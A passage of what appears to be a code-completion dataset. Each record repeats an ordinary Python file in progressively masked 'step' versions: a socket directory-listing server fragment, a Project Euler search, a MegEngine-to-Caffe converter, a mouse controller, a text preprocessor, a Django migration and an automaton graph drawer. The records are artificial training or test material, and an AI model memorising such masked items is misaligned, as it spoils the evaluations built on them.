self.clientCommandSock.send(str(len(str(os.listdir(self.listdirPath)))).encode('utf-8'))\n while (self.clientCommandSock.recv(32)).decode('utf-8') != 'Listdir Size Received':\n print('Waiting for Listdir Size to deliver...')\n time.sleep(1)\n else:\n print('Listdir Size Delivered!')\n self.clientCommandSock.sendall(str(os.listdir(self.listdirPath)).encode('utf-8'))\n while (self.clientCommandSock.recv(32)).decode('utf-8') != 'Listdir Received':\n print('Waiting for Listdir to deliver...')\n time.sleep(1)\n else:\n print('Listdir Delivered!')\n\n\n\nif __name__ == '__main__':\n myServer = server()\n threading.Thread(target=myServer.dicision()).start()\n\n",
"step-ids": [
7,
9,
11,
15,
16
]
}
|
[
7,
9,
11,
15,
16
] |
import math
import time
t1 = time.time()
# n(3n-1)/2
def isPentagon(item):
num = math.floor(math.sqrt(item*2//3))+1
if num*(3*num-1)//2 == item:
return True
return False
# n(2n-1)
def isHexagon(item):
num = math.floor(math.sqrt(item//2))+1
if num*(2*num-1) == item:
return True
return False
i = 285
t = 0
while t == 0:
i += 1
n = i*(i+1)//2
if isPentagon(n) and isHexagon(n):
t = 1
print (n)
print("time:",time.time()-t1)
|
normal
|
{
"blob_id": "0aec3fbc9f4b9f33aee021fa417c43f0feb0e3d1",
"index": 3296,
"step-1": "<mask token>\n\n\ndef isPentagon(item):\n num = math.floor(math.sqrt(item * 2 // 3)) + 1\n if num * (3 * num - 1) // 2 == item:\n return True\n return False\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef isPentagon(item):\n num = math.floor(math.sqrt(item * 2 // 3)) + 1\n if num * (3 * num - 1) // 2 == item:\n return True\n return False\n\n\ndef isHexagon(item):\n num = math.floor(math.sqrt(item // 2)) + 1\n if num * (2 * num - 1) == item:\n return True\n return False\n\n\n<mask token>\nwhile t == 0:\n i += 1\n n = i * (i + 1) // 2\n if isPentagon(n) and isHexagon(n):\n t = 1\n print(n)\nprint('time:', time.time() - t1)\n",
"step-3": "<mask token>\nt1 = time.time()\n\n\ndef isPentagon(item):\n num = math.floor(math.sqrt(item * 2 // 3)) + 1\n if num * (3 * num - 1) // 2 == item:\n return True\n return False\n\n\ndef isHexagon(item):\n num = math.floor(math.sqrt(item // 2)) + 1\n if num * (2 * num - 1) == item:\n return True\n return False\n\n\ni = 285\nt = 0\nwhile t == 0:\n i += 1\n n = i * (i + 1) // 2\n if isPentagon(n) and isHexagon(n):\n t = 1\n print(n)\nprint('time:', time.time() - t1)\n",
"step-4": "import math\nimport time\nt1 = time.time()\n\n\ndef isPentagon(item):\n num = math.floor(math.sqrt(item * 2 // 3)) + 1\n if num * (3 * num - 1) // 2 == item:\n return True\n return False\n\n\ndef isHexagon(item):\n num = math.floor(math.sqrt(item // 2)) + 1\n if num * (2 * num - 1) == item:\n return True\n return False\n\n\ni = 285\nt = 0\nwhile t == 0:\n i += 1\n n = i * (i + 1) // 2\n if isPentagon(n) and isHexagon(n):\n t = 1\n print(n)\nprint('time:', time.time() - t1)\n",
"step-5": "import math\nimport time\n\nt1 = time.time()\n\n# n(3n-1)/2\ndef isPentagon(item):\n num = math.floor(math.sqrt(item*2//3))+1\n if num*(3*num-1)//2 == item:\n return True\n return False\n\n# n(2n-1)\ndef isHexagon(item):\n num = math.floor(math.sqrt(item//2))+1\n if num*(2*num-1) == item:\n return True\n return False\n\n\ni = 285\nt = 0\nwhile t == 0:\n i += 1\n n = i*(i+1)//2\n if isPentagon(n) and isHexagon(n):\n t = 1\n print (n)\n\nprint(\"time:\",time.time()-t1)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mge_to_caffe(mge_fpath, prototxt='out.prototxt', caffemodel=
'out.caffemodel', outspec=None, use_empty_blobs=False):
assert isinstance(mge_fpath, str), 'mge_fpath must be string'
irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()
transformer_options = [TransformerRule.EXPAND_MUL_ADD3, TransformerRule
.FUSE_FOR_LEAKY_RELU]
transformer = IRTransform(transformer_options)
transformed_irgraph = transformer.transform(irgraph)
converter = CaffeConverter(transformed_irgraph, use_empty_blobs)
converter.convert()
assert isinstance(prototxt, str) and isinstance(caffemodel, str
), "'prototxt' and 'caffemodel' must be string"
converter.dump(prototxt, caffemodel)
<|reserved_special_token_1|>
from ..backend.ir_to_caffe import CaffeConverter
from ..converter_ir.ir_transform import IRTransform, TransformerRule
from ..frontend.mge_to_ir import MGE_FrontEnd
def mge_to_caffe(mge_fpath, prototxt='out.prototxt', caffemodel=
'out.caffemodel', outspec=None, use_empty_blobs=False):
assert isinstance(mge_fpath, str), 'mge_fpath must be string'
irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()
transformer_options = [TransformerRule.EXPAND_MUL_ADD3, TransformerRule
.FUSE_FOR_LEAKY_RELU]
transformer = IRTransform(transformer_options)
transformed_irgraph = transformer.transform(irgraph)
converter = CaffeConverter(transformed_irgraph, use_empty_blobs)
converter.convert()
assert isinstance(prototxt, str) and isinstance(caffemodel, str
), "'prototxt' and 'caffemodel' must be string"
converter.dump(prototxt, caffemodel)
<|reserved_special_token_1|>
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
from ..backend.ir_to_caffe import CaffeConverter
from ..converter_ir.ir_transform import IRTransform, TransformerRule
from ..frontend.mge_to_ir import MGE_FrontEnd
def mge_to_caffe(
mge_fpath,
prototxt="out.prototxt",
caffemodel="out.caffemodel",
outspec=None,
use_empty_blobs=False,
):
assert isinstance(mge_fpath, str), "mge_fpath must be string"
irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()
transformer_options = [
TransformerRule.EXPAND_MUL_ADD3,
TransformerRule.FUSE_FOR_LEAKY_RELU,
]
transformer = IRTransform(transformer_options)
transformed_irgraph = transformer.transform(irgraph)
converter = CaffeConverter(transformed_irgraph, use_empty_blobs)
converter.convert()
assert isinstance(prototxt, str) and isinstance(
caffemodel, str
), "'prototxt' and 'caffemodel' must be string"
converter.dump(prototxt, caffemodel)
|
flexible
|
{
"blob_id": "a83230e71cc1bcc843d00487746f16114d304eec",
"index": 4908,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef mge_to_caffe(mge_fpath, prototxt='out.prototxt', caffemodel=\n 'out.caffemodel', outspec=None, use_empty_blobs=False):\n assert isinstance(mge_fpath, str), 'mge_fpath must be string'\n irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()\n transformer_options = [TransformerRule.EXPAND_MUL_ADD3, TransformerRule\n .FUSE_FOR_LEAKY_RELU]\n transformer = IRTransform(transformer_options)\n transformed_irgraph = transformer.transform(irgraph)\n converter = CaffeConverter(transformed_irgraph, use_empty_blobs)\n converter.convert()\n assert isinstance(prototxt, str) and isinstance(caffemodel, str\n ), \"'prototxt' and 'caffemodel' must be string\"\n converter.dump(prototxt, caffemodel)\n",
"step-3": "from ..backend.ir_to_caffe import CaffeConverter\nfrom ..converter_ir.ir_transform import IRTransform, TransformerRule\nfrom ..frontend.mge_to_ir import MGE_FrontEnd\n\n\ndef mge_to_caffe(mge_fpath, prototxt='out.prototxt', caffemodel=\n 'out.caffemodel', outspec=None, use_empty_blobs=False):\n assert isinstance(mge_fpath, str), 'mge_fpath must be string'\n irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()\n transformer_options = [TransformerRule.EXPAND_MUL_ADD3, TransformerRule\n .FUSE_FOR_LEAKY_RELU]\n transformer = IRTransform(transformer_options)\n transformed_irgraph = transformer.transform(irgraph)\n converter = CaffeConverter(transformed_irgraph, use_empty_blobs)\n converter.convert()\n assert isinstance(prototxt, str) and isinstance(caffemodel, str\n ), \"'prototxt' and 'caffemodel' must be string\"\n converter.dump(prototxt, caffemodel)\n",
"step-4": "# MegEngine is Licensed under the Apache License, Version 2.0 (the \"License\")\n#\n# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nfrom ..backend.ir_to_caffe import CaffeConverter\nfrom ..converter_ir.ir_transform import IRTransform, TransformerRule\nfrom ..frontend.mge_to_ir import MGE_FrontEnd\n\n\ndef mge_to_caffe(\n mge_fpath,\n prototxt=\"out.prototxt\",\n caffemodel=\"out.caffemodel\",\n outspec=None,\n use_empty_blobs=False,\n):\n assert isinstance(mge_fpath, str), \"mge_fpath must be string\"\n irgraph = MGE_FrontEnd(mge_fpath, outspec=outspec).resolve()\n\n transformer_options = [\n TransformerRule.EXPAND_MUL_ADD3,\n TransformerRule.FUSE_FOR_LEAKY_RELU,\n ]\n transformer = IRTransform(transformer_options)\n transformed_irgraph = transformer.transform(irgraph)\n\n converter = CaffeConverter(transformed_irgraph, use_empty_blobs)\n converter.convert()\n\n assert isinstance(prototxt, str) and isinstance(\n caffemodel, str\n ), \"'prototxt' and 'caffemodel' must be string\"\n converter.dump(prototxt, caffemodel)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from pymouse import PyMouse
m = PyMouse()
w,h = m.screen_size()
class base_controller:
def __init__(self):
pass
def move(self,xy:list):
'''
移动
'''
m.move(xy[0]*w,xy[1]*h)
def click(self, xy:list):
'''
点击
'''
m.click(xy[0]*w,xy[1]*h)
def scroll(self, marks:list):
'''
滚动
'''
d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy:list, ones = True):
'''
长按
'''
if ones:
m.press(xy[0]*w,xy[1]*h)
else:
m.drag(xy[0]*w,xy[1]*h)
def release(self, xy:list):
'''
松开
'''
m.release(xy[0]*w,xy[1]*h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
|
normal
|
{
"blob_id": "b2f2f1e4b7070ac867b71e538f759e527eb1ffb9",
"index": 416,
"step-1": "<mask token>\n\n\nclass base_controller:\n <mask token>\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n <mask token>\n <mask token>\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-2": "<mask token>\n\n\nclass base_controller:\n <mask token>\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-3": "<mask token>\nm = PyMouse()\nw, h = m.screen_size()\n\n\nclass base_controller:\n\n def __init__(self):\n pass\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-4": "from pymouse import PyMouse\nm = PyMouse()\nw, h = m.screen_size()\n\n\nclass base_controller:\n\n def __init__(self):\n pass\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-5": "from pymouse import PyMouse\nm = PyMouse()\nw,h = m.screen_size()\n\nclass base_controller:\n def __init__(self):\n pass\n\n def move(self,xy:list):\n '''\n 移动\n '''\n m.move(xy[0]*w,xy[1]*h)\n \n def click(self, xy:list):\n '''\n 点击\n '''\n m.click(xy[0]*w,xy[1]*h)\n \n def scroll(self, marks:list):\n '''\n 滚动\n '''\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy:list, ones = True):\n '''\n 长按\n '''\n if ones:\n m.press(xy[0]*w,xy[1]*h)\n else:\n m.drag(xy[0]*w,xy[1]*h)\n\n def release(self, xy:list):\n '''\n 松开\n '''\n m.release(xy[0]*w,xy[1]*h)\n\n\nclass mac_controller(base_controller):\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-ids": [
6,
8,
10,
11,
12
]
}
|
[
6,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
class Preprocessor(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Preprocessor(object):
<|reserved_special_token_0|>
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Preprocessor(object):
<|reserved_special_token_0|>
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
def preprocess_doc_with_url(self, doc_with_url):
with ProcessPoolExecutor(max_workers=self.max_workers):
url, content = doc_with_url
return url, self.preprocess_doc(content)
<|reserved_special_token_0|>
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
<|reserved_special_token_1|>
from concurrent.futures import ProcessPoolExecutor
from nltk import PorterStemmer, RegexpTokenizer
from stop_words import get_stop_words
class Preprocessor(object):
def __init__(self, max_workers=4):
self.max_workers = max_workers
self.tokenizer = RegexpTokenizer('\\w+')
self.en_stopwords = set(get_stop_words('en'))
self.p_stemmer = PorterStemmer()
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
def preprocess_doc_with_url(self, doc_with_url):
with ProcessPoolExecutor(max_workers=self.max_workers):
url, content = doc_with_url
return url, self.preprocess_doc(content)
def process_docs_with_urls(self, urldoc_list):
return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
<|reserved_special_token_1|>
from concurrent.futures import ProcessPoolExecutor
from nltk import PorterStemmer, RegexpTokenizer
from stop_words import get_stop_words
class Preprocessor(object):
def __init__(self, max_workers=4):
self.max_workers = max_workers
self.tokenizer = RegexpTokenizer(r"\w+")
self.en_stopwords = set(get_stop_words("en"))
self.p_stemmer = PorterStemmer()
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
def preprocess_doc_with_url(self, doc_with_url):
with ProcessPoolExecutor(max_workers=self.max_workers):
url, content = doc_with_url
return url, self.preprocess_doc(content)
def process_docs_with_urls(self, urldoc_list):
return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
|
flexible
|
{
"blob_id": "8cd50e1f0e0feb4d753443220f9fa9065e80e0ef",
"index": 6358,
"step-1": "<mask token>\n\n\nclass Preprocessor(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass WithUrlPreprocessor(Preprocessor):\n\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-2": "<mask token>\n\n\nclass Preprocessor(object):\n <mask token>\n\n def preprocess_doc(self, doc):\n tokens = self.tokenizer.tokenize(doc.lower())\n stopped_tokens = [i for i in tokens if i not in self.en_stopwords]\n stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]\n return stemmed_tokens\n\n def process_docs(self, doc_list):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n return [self.preprocess_doc(doc) for doc in doc_list]\n <mask token>\n <mask token>\n\n\nclass WithUrlPreprocessor(Preprocessor):\n\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-3": "<mask token>\n\n\nclass Preprocessor(object):\n <mask token>\n\n def preprocess_doc(self, doc):\n tokens = self.tokenizer.tokenize(doc.lower())\n stopped_tokens = [i for i in tokens if i not in self.en_stopwords]\n stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]\n return stemmed_tokens\n\n def process_docs(self, doc_list):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n return [self.preprocess_doc(doc) for doc in doc_list]\n\n def preprocess_doc_with_url(self, doc_with_url):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n url, content = doc_with_url\n return url, self.preprocess_doc(content)\n <mask token>\n\n\nclass WithUrlPreprocessor(Preprocessor):\n\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-4": "from concurrent.futures import ProcessPoolExecutor\nfrom nltk import PorterStemmer, RegexpTokenizer\nfrom stop_words import get_stop_words\n\n\nclass Preprocessor(object):\n\n def __init__(self, max_workers=4):\n self.max_workers = max_workers\n self.tokenizer = RegexpTokenizer('\\\\w+')\n self.en_stopwords = set(get_stop_words('en'))\n self.p_stemmer = PorterStemmer()\n\n def preprocess_doc(self, doc):\n tokens = self.tokenizer.tokenize(doc.lower())\n stopped_tokens = [i for i in tokens if i not in self.en_stopwords]\n stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]\n return stemmed_tokens\n\n def process_docs(self, doc_list):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n return [self.preprocess_doc(doc) for doc in doc_list]\n\n def preprocess_doc_with_url(self, doc_with_url):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n url, content = doc_with_url\n return url, self.preprocess_doc(content)\n\n def process_docs_with_urls(self, urldoc_list):\n return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]\n\n\nclass WithUrlPreprocessor(Preprocessor):\n\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-5": "from concurrent.futures import ProcessPoolExecutor\n\nfrom nltk import PorterStemmer, RegexpTokenizer\nfrom stop_words import get_stop_words\n\n\nclass Preprocessor(object):\n def __init__(self, max_workers=4):\n self.max_workers = max_workers\n self.tokenizer = RegexpTokenizer(r\"\\w+\")\n self.en_stopwords = set(get_stop_words(\"en\"))\n self.p_stemmer = PorterStemmer()\n\n def preprocess_doc(self, doc):\n tokens = self.tokenizer.tokenize(doc.lower())\n\n stopped_tokens = [i for i in tokens if i not in self.en_stopwords]\n\n stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]\n\n return stemmed_tokens\n\n def process_docs(self, doc_list):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n return [self.preprocess_doc(doc) for doc in doc_list]\n\n def preprocess_doc_with_url(self, doc_with_url):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n url, content = doc_with_url\n\n return url, self.preprocess_doc(content)\n\n def process_docs_with_urls(self, urldoc_list):\n return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]\n\n\nclass WithUrlPreprocessor(Preprocessor):\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-ids": [
4,
6,
7,
10,
11
]
}
|
[
4,
6,
7,
10,
11
] |
# Generated by Django 3.2.4 on 2021-07-18 02:05
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('tracker', '0003_auto_20210626_0735'),
]
operations = [
migrations.CreateModel(
name='Result',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_date', models.DateTimeField(auto_now_add=True, db_index=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, db_index=True)),
('value', models.TextField(max_length=2000)),
('tracker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker')),
],
options={
'abstract': False,
},
),
]
|
normal
|
{
"blob_id": "ead843f1edcfe798613effb049e3ca79dcd03b71",
"index": 7919,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('tracker', '0003_auto_20210626_0735')]\n operations = [migrations.CreateModel(name='Result', fields=[('uuid',\n models.UUIDField(default=uuid.uuid4, editable=False, primary_key=\n True, serialize=False)), ('created_date', models.DateTimeField(\n auto_now_add=True, db_index=True, null=True)), ('modified_date',\n models.DateTimeField(auto_now=True, db_index=True)), ('value',\n models.TextField(max_length=2000)), ('tracker', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker'))\n ], options={'abstract': False})]\n",
"step-4": "from django.db import migrations, models\nimport django.db.models.deletion\nimport uuid\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('tracker', '0003_auto_20210626_0735')]\n operations = [migrations.CreateModel(name='Result', fields=[('uuid',\n models.UUIDField(default=uuid.uuid4, editable=False, primary_key=\n True, serialize=False)), ('created_date', models.DateTimeField(\n auto_now_add=True, db_index=True, null=True)), ('modified_date',\n models.DateTimeField(auto_now=True, db_index=True)), ('value',\n models.TextField(max_length=2000)), ('tracker', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker'))\n ], options={'abstract': False})]\n",
"step-5": "# Generated by Django 3.2.4 on 2021-07-18 02:05\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('tracker', '0003_auto_20210626_0735'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Result',\n fields=[\n ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),\n ('created_date', models.DateTimeField(auto_now_add=True, db_index=True, null=True)),\n ('modified_date', models.DateTimeField(auto_now=True, db_index=True)),\n ('value', models.TextField(max_length=2000)),\n ('tracker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker')),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state,
accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state,
accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[from_state, to_state] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format='png', view
=True)
def make_label(self, rule):
return 'ε' if rule._character == None else rule._character
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_next_state(self, rule):
return rule._next_state
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style='invis', shape='point')
graph.edge(dummy_node, self.state_to_str(start_state), style='bold')
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state,
accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state,
accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[from_state, to_state] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format='png', view
=True)
def make_label(self, rule):
return 'ε' if rule._character == None else rule._character
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_next_state(self, rule):
return rule._next_state
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style='invis', shape='point')
graph.edge(dummy_node, self.state_to_str(start_state), style='bold')
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
<|reserved_special_token_0|>
def state_to_str(self, state):
if isinstance(state, str):
return state
try:
iter(state)
if len(state) == 0:
return 'Ø'
list_str = str([self.state_to_str(e) for e in sorted(state)])
return list_str.replace('[', '{').replace(']', '}')
except TypeError:
return str(state)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state,
accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state,
accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[from_state, to_state] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format='png', view
=True)
def make_label(self, rule):
return 'ε' if rule._character == None else rule._character
